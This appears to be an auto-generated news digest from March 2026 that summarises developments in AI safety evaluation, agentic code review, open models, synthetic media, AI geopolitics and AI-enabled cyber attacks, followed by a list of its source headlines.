Safety evaluation platforms, manipulation/benchmarking, and emerging AI cybercrime

AI Security Benchmarks & Threats

Key Questions

How do recent agentic evaluation and code-review tools change safety practice?

Agentic evaluation systems (e.g., One-Eval) and agentic code-review tools (e.g., Sashiko) enable continuous, traceable testing of model behavior and autogenerated code. They help catch regressions, unsafe actions, and malicious capability growth earlier in CI/CD and at runtime, but they must be themselves hardened against manipulation and provide transparent audit trails.

What new risks arise from large vendors releasing open models to power agentic and physical systems?

Open, capable models (such as NVIDIA's announcements) lower barriers for building persistent agents and physical integrations, accelerating innovation while broadening the pool of potentially malicious actors. Risks include easier creation of autonomous cyber-attack tooling, supply-chain misuse, and proliferation of unvetted agent behaviors—necessitating provenance, usage controls, and export-aware deployment practices.

Which technical advances most affect generative-media threat models?

Video-token optimizations (e.g., NVILA/AutoGaze) and higher-fidelity generative pipelines (DLSS 5, advanced video models) make photorealistic synthetic video cheaper and faster to produce. Coupled with improved VLM robustness techniques (Directional Embedding Smoothing), this increases both the realism of synthetic media and the difficulty of detection—heightening disinformation, impersonation, and privacy-harm risks.

What immediate mitigation steps should organizations adopt given these trends?

Adopt continuous evaluation and runtime monitoring for agents; integrate automated code-verification and agentic code-review into deployment pipelines; apply provenance, watermarking, and detection tools for synthetic media; enforce least-privilege and zero-trust for agent tool access; and participate in multi-stakeholder norms and incident-sharing to address cross-border AI-enabled cybercrime.

The 2026 AI Safety, Manipulation, and Geopolitical Landscape: New Developments and Critical Implications

As we progress through 2026, the AI ecosystem continues to accelerate in complexity and capability, bringing both unprecedented opportunities and profound security challenges. The convergence of autonomous, self-evolving agents, sophisticated multimedia generation, and open foundation models is reshaping societal, military, and economic domains. However, these advances are accompanied by escalating risks of manipulation, disinformation, and cyber warfare—necessitating a reevaluation of safety infrastructure, evaluation methodologies, and international norms.

Strengthening Safety Infrastructure Amidst Escalating Threats

The foundation of trustworthy AI remains paramount. Recent developments focus on integrating automated, agentic evaluation systems, robust code review tools, and verification frameworks that can keep pace with rapidly evolving AI capabilities:

Automated and Traceable Evaluation (One-Eval):
The introduction of One-Eval marks a significant step toward continuous, autonomous evaluation of large language models (LLMs). As an agentic system, One-Eval can perform real-time, traceable assessments of AI outputs, ensuring safety, alignment, and correctness even as models self-improve. Its deployment allows for dynamic oversight, critical when models operate in high-stakes environments.
Agentic Code Review (Sashiko):
Google's recent launch of "Sashiko" exemplifies the shift toward automated, agentic code review. Designed specifically for the Linux kernel, Sashiko employs AI agents capable of analyzing and verifying complex codebases, dramatically reducing human oversight and potential oversight gaps. This tool enhances security, especially in critical infrastructure, by detecting vulnerabilities and preventing malicious code insertion.
Automated Verification of AI-Generated Code:
As autonomous agents increasingly write and deploy code, verification tools are essential. Advances in automated safety verification pipelines aim to detect backdoors, malicious behaviors, and manipulation attempts in AI-generated software. These tools are integral to preventing cyber exploits and supply chain attacks, which pose significant risks in a landscape of persistent autonomous agents.

Rise of Open, Agent-Focused Foundation Models

The landscape of foundation models has shifted toward open, scalable architectures optimized for agentic reasoning and physical-world interaction:

NVIDIA’s Open Models:
At GTC 2026, NVIDIA announced a broad expansion of open model families, including the NVILA series, which are designed to power persistent, reasoning-capable AI agents. These models are compact enough for deployment in edge devices, enabling continuous interaction with physical environments—from robotics to autonomous vehicles. The open nature democratizes access but simultaneously widens attack surfaces and exposes vulnerabilities if security is not meticulously managed.
Compact Deployment for Persistent Agents:
The availability of smaller, efficient models facilitates deployment of persistent agents that can operate continuously across sectors—military, industrial, and consumer. However, more capable agents mean more sophisticated attack vectors, including model manipulation and adversarial exploits, requiring robust runtime protections.

Advances in Multimodal and Video Models—Driving Generative Media and Disinformation

The multimedia generation landscape continues to evolve rapidly, amplifying both creative potential and disinformation risks:

Enhanced Video and Image Synthesis:
Technologies such as Nvidia’s NVILA-8B-HD-Video leverage autoGaze techniques that cut video tokens up to 100× for high-resolution, real-time video generation. These models can produce hyper-realistic content suitable for entertainment, virtual environments, and surveillance. Similarly, Seedance 2.0 from ByteDance—delayed amidst Hollywood industry pressures—aims to revolutionize video AI capabilities.
Robustness Techniques (Directional Embedding Smoothing):
To address vulnerabilities in vision-language models (VLMs), techniques like Directional Embedding Smoothing are being developed to enhance robustness against adversarial inputs. Such methods improve model reliability, but also raise the bar for detection of maliciously manipulated media.
Proliferation of Deepfake and Synthetic Media:
Democratized access to deepfake tools—including RealWonder, HiFi-Inpaint, and DreamWorld—means high-quality synthetic media can be generated by non-experts. This democratization fuels disinformation campaigns, privacy violations, and societal destabilization. Notably, recent lawsuits against Musk’s xAI over explicit images created without consent highlight the ethical and legal complexities surrounding synthetic media.

Geopolitical Dynamics, Regulation, and Open-Weight Model Risks

The geopolitics of AI in 2026 continues to be shaped by strategic moves, regulatory tensions, and norm-setting efforts:

China’s Offline and Self-Reliance Strategy:
China emphasizes offline deployment of models like Qwen 3.5-9B and U-Claw, designed to operate securely without internet connectivity. This approach aims to reduce dependency on global infrastructure, mitigate sanctions, and foster domestic AI sovereignty, positioning China as a resilient AI power.
Western Regulatory Efforts and Tensions:
The EU’s AI Act and content regulation proposals focus on transparency, safety, and provenance, but face pushback amid concerns over free speech and government overreach. Meanwhile, legal disputes—such as Anthropic’s lawsuit against the U.S. government—highlight ongoing tensions over access and control.
Military and Strategic Investments:
Countries like Saudi Arabia and the U.S. continue massive investments in autonomous military AI, exemplified by Saronic’s naval AI project. These initiatives increase risks of AI-driven escalation in conflicts, especially if adversarial manipulation or malicious use occurs, underscoring the necessity for international norms and trustworthy standards.

Recent Key Developments and Emerging Challenges

Several events underscore the rapid evolution and emerging threats:

OpenAI’s Government Partnerships:
Rumors suggest OpenAI has expanded collaborations with AWS to supply AI systems to the U.S. government, including classified projects. Such partnerships heighten concerns about security, oversight, and militarization, emphasizing the need for stringent safeguards.
Automated Verification of AI-Generated Code:
Researchers are making strides toward tools that verify the safety of unreviewed AI-generated code in real-time. This is critical for preventing exploits and software supply chain attacks as autonomous agents increasingly write and deploy code autonomously.
Tools for Human Verification:
Initiatives like "World’s" human verification tools aim to authenticate human involvement behind AI-driven online activities, addressing trust issues related to automated interactions and disinformation.
AI Agents Conducting Cyber Attacks:
Investigations reveal that autonomous AI agents can identify vulnerabilities, launch exploits, and evade detection, effectively transforming AI into offensive cyber weapons. This development heightens the threat to critical infrastructure and cyberspace security, calling for international cooperation and advanced detection frameworks.

Current Status and Implications

The AI landscape in 2026 is characterized by remarkable innovation intertwined with urgent security concerns. The rise of autonomous, self-evolving agents paired with powerful multimodal models offers immense societal benefits but also amplifies risks—from disinformation to cyber warfare.

Strategic responses are emerging:

Integrated safety and evaluation pipelines such as One-Eval enable real-time detection of manipulation, backdoors, and malicious behaviors.
Robust verification frameworks for AI-generated code and agent actions help prevent exploits.
Provenance and traceability tools for synthetic media are vital in counteracting disinformation.
International norms and regulations are crucial for preventing AI-enabled cybercrime and military escalation.

As society navigates this transformative era, responsible development, transparent regulation, and global coordination will be essential. Decisions made now will determine whether AI becomes a tool for stability and progress or a catalyst for conflict and chaos. The path forward demands vigilance, innovation, and cooperation to harness AI’s potential while safeguarding against its emerging threats.

Sources (35)

Updated Mar 18, 2026

Safety evaluation platforms, manipulation/benchmarking, and emerging AI cybercrime

Key Questions

How do recent agentic evaluation and code-review tools change safety practice?

What new risks arise from large vendors releasing open models to power agentic and physical systems?

Which technical advances most affect generative-media threat models?

What immediate mitigation steps should organizations adopt given these trends?

The 2026 AI Safety, Manipulation, and Geopolitical Landscape: New Developments and Critical Implications

Strengthening Safety Infrastructure Amidst Escalating Threats

Rise of Open, Agent-Focused Foundation Models

Advances in Multimodal and Video Models—Driving Generative Media and Disinformation

Geopolitical Dynamics, Regulation, and Open-Weight Model Risks

Recent Key Developments and Emerging Challenges

Current Status and Implications

NVIDIA Launches Advanced Open Models to Power Agentic, Physical ...

Google Engineers Launch "Sashiko" for Agentic AI Code Review of the Linux Kernel

Directional Embedding Smoothing for Robust Vision Language Models

NVILA-8B-HD-Video Explained: AutoGaze Cuts Video Tokens up to 100× (4K/1K-Frame VLM)

One-Eval: An Agentic System for Automated and Traceable LLM Evaluation

OpenAI expands government footprint with AWS deal, report says

Toward automated verification of unreviewed AI-generated code

World launches tool to verify humans behind AI shopping agents

@daniel_271828 reposted: Can AI agents conduct advanced cyber-attacks autonomously? We tested seven mode...

XProtect Video Summarization from Milestone

z.ai debuts faster, cheaper GLM-5 Turbo model for agents and 'claws' — but it's not open-source

Nvidia’s DLSS 5 uses generative AI to boost photorealism in video games, with ambitions beyond gaming

ByteDance's AI Video Tool Seedance 2.0 Reportedly Delayed Amid Hollywood Pressure

Teenagers sue Musk's company over pornographic images created by Grok

@robinomial reposted: 𝗣𝗿𝗶𝘃𝗮𝘁𝗲 𝘀𝘆𝗻𝘁𝗵𝗲𝘁𝗶𝗰 𝘁𝗲𝘅𝘁 𝗴𝗲𝗻𝗲𝗿𝗮𝘁𝗶𝗼𝗻 has had the same problem for a while: privacy,...

@therundownai: Perplexity just launched "Personal Computer", an always-on AI agent that merges their cloud-based Co...

Code-Space Response Oracles: Generating Interpretable Multi-Agent Policies with Large Language Models

In-Context Reinforcement Learning for Tool Use in Large Language Models

@Scobleizer: The autonomous AI agent age is here. "Unlike chatbots that wait for prompts, Base44 Superagent can ...

Gemini 3.1 Pro Backlash: The Benchmark Monster Developers Say Is Borderline Unusable

@minchoi: Nvidia just dropped Nemotron 3 Super. &gt; 1M token context &gt; 120B parameters &gt; Open weights ...

These 4 New AI Releases Are Next Level (open-source)

Google Finalizes $32B Acquisition of Wiz to Strengthen Cloud and AI Security

@omarsar0: A self-evolving framework to discover and refine agent skills. Most agent skills I see today are ha...

Why AI Chatbots Agree with You Even When You're Wrong

AI security: How to protect your tools and processes

Upcoming Vote on Chat Control: Renew Deal Is Worse Than Rejected Draft Report

Defense Funding In The Drone Warfare Age

@huggingface reposted: Today we're releasing our first open source TTS model, TADA! TADA (Text Audio D...

Eridu Emerges from Stealth with Over $200M in Funding To Break Through the Network Wall and Unlock Faster AI

Anthropic sues in federal court to reverse Trump administration's 'supply chain risk' designation

Open Telco AI Leaderboard: New Standard for Telecom AI Benchmarking

Show HN: U-Claw – An Offline Installer USB for OpenClaw in China

AI risks come to fore amid standoff with Anthropic - World - Chinadaily.com.cn

Meet the startups trying to build military-specific AI

@minchoi: Nvidia just dropped Nemotron 3 Super. > 1M token context > 120B parameters > Open weights ...